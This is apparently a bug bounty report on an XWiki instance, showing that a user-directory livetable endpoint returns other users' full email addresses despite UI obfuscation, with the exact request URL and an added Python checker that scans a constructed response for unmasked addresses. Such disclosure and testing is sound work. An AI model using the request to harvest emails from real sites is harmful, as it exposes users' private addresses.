*SUBMISSION REFERENCES*
- Submission code: XWIKI-7B910O3J
- Submission URL: https://www.intigriti.com/auth/dashboard?redirect=/submissions/e95a7ad5-7029-4627-abf0-3e3e3ea0b4ce/XWIKI-7B910O3J

*RESEARCHER INFORMATION*
- Submitter: floerer

*SUBMISSION INFORMATION*
- Created at: Thu, 03 Nov 2022 07:48:27 GMT
- Submission status: Accepted Archived

*REPORT CONTENT*
- Severity: High (7.5)
- Domain: https://intigriti.xwiki.com/ (URL)
- Proof of concept: According to the out-of-scope section, all user data is public except for the email and password; however, it is possible to retrieve the email addresses of other users.

*Prerequisite*
- Activate email obfuscation.

*Steps to reproduce*
1. Go to https://intigriti.xwiki.com/xwiki/bin/get/XWiki/UserDirectoryLivetableResults?outputSyntax=plain&transprefix=xe.userdirectory.&classname=XWiki.XWikiUsers&collist=_avatar%2Cdoc.name%2Cfirst_name%2Clast_name%2Cemail%2Cactive&queryFilters=currentlanguage%2Chidden&&hideDisabledProfiles=true&offset=1&limit=10&reqNo=1&sort=doc.name&dir=asc
2. You will now see the list of users. Search for `floerer@intigriti.me` and you will see that my email address is there: only the short version `f....@intigriti.me` is shown in the frontend, but via the endpoint the full address can be retrieved.

- Impact: Retrieve the full email addresses of all users on the platform.
- Personal data involved: No
- Endpoint: https://intigriti.xwiki.com/xwiki/bin/get/XWiki/UserDirectoryLivetableResults?outputSyntax=plain&transprefix=xe.userdirectory.&classname=XWiki.XWikiUsers&collist=_avatar%2Cdoc.name%2Cfirst_name%2Clast_name%2Cemail%2Cactive&queryFilters=currentlanguage%2Chidden&&hideDisabledProfiles=true&offset=1&limit=10&reqNo=1&sort=doc.name&dir=asc
- Type: Improper Access Control
- Attachments: No attachments available
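The check below is an added example and is not part of the original submission or of XWiki's own code. It reproduces the comparison from the steps above offline: it builds the livetable request with the report's parameters (so the `collist` with `email` is visible in the request) and scans a livetable JSON response for rows whose `email` column is a full address rather than the obfuscated `f....@` form the profile UI shows. The response layout (a `rows` list with `doc_name` and `email` keys) is an assumption based on the XWiki livetable JSON format, the obfuscation pattern is assumed from the report's `f....@intigriti.me` example, and the sample response is constructed.

```python
"""
Added example (not from the original submission or from XWiki): check whether a
UserDirectoryLivetableResults response returns full e-mail addresses even though
the profile UI shows them obfuscated.

ASSUMPTIONS: the JSON layout (top-level "rows" list, row keys "doc_name" and
"email") follows the XWiki livetable format; the obfuscated form is one leading
character, a run of dots, then "@domain" (from the report's "f....@intigriti.me").
The SAMPLE_RESPONSE below is constructed, not captured.
"""
import json
import re
from urllib.parse import parse_qs, urlencode, urlparse

# Endpoint taken from the report above.
BASE = "https://intigriti.xwiki.com/xwiki/bin/get/XWiki/UserDirectoryLivetableResults"

# Assumed obfuscation shape shown by the frontend, e.g. "f....@intigriti.me".
OBFUSCATED_RE = re.compile(r"^[^@.]\.{2,}@[^@]+$")


def build_livetable_url(columns, limit=10, offset=1):
    """Build the livetable query with the report's parameters and a chosen column list."""
    params = {
        "outputSyntax": "plain",
        "transprefix": "xe.userdirectory.",
        "classname": "XWiki.XWikiUsers",
        "collist": ",".join(columns),
        "queryFilters": "currentlanguage,hidden",
        "hideDisabledProfiles": "true",
        "offset": str(offset),
        "limit": str(limit),
        "reqNo": "1",
        "sort": "doc.name",
        "dir": "asc",
    }
    return f"{BASE}?{urlencode(params)}"


def requested_columns(url):
    """Return the columns a livetable URL asks for; 'email' in here is the red flag."""
    query = parse_qs(urlparse(url).query)
    return query.get("collist", [""])[0].split(",")


def is_obfuscated(email):
    """True if the address is in the masked form the UI displays."""
    return bool(OBFUSCATED_RE.match(email))


def find_leaked_emails(livetable_json):
    """Return (doc_name, email) for every row whose email column is a full address."""
    data = json.loads(livetable_json)
    leaked = []
    for row in data.get("rows", []):
        email = row.get("email") or ""
        if "@" in email and not is_obfuscated(email):
            leaked.append((row.get("doc_name"), email))
    return leaked


# CONSTRUCTED sample response in the assumed livetable JSON layout. The first row
# mirrors the report (the researcher's own address); the others are invented.
SAMPLE_RESPONSE = json.dumps({
    "reqNo": 1, "totalrows": 3, "returnedrows": 3, "offset": 1,
    "rows": [
        {"doc_name": "floerer", "first_name": "", "last_name": "",
         "email": "floerer@intigriti.me", "active": 1},
        {"doc_name": "alice", "email": "a....@example.org", "active": 1},
        {"doc_name": "bob", "email": "", "active": 1},
    ],
})


if __name__ == "__main__":
    url = build_livetable_url(
        ["_avatar", "doc.name", "first_name", "last_name", "email", "active"])
    print("request:", url)
    print("columns requested:", requested_columns(url))
    for name, email in find_leaked_emails(SAMPLE_RESPONSE):
        print(f"LEAK: {name} -> {email}")
```

To test against a live instance, fetch the URL from `build_livetable_url` with the same session the UI uses and pass the response body to `find_leaked_emails`; an empty result means the endpoint honours the obfuscation setting, a non-empty one reproduces the finding.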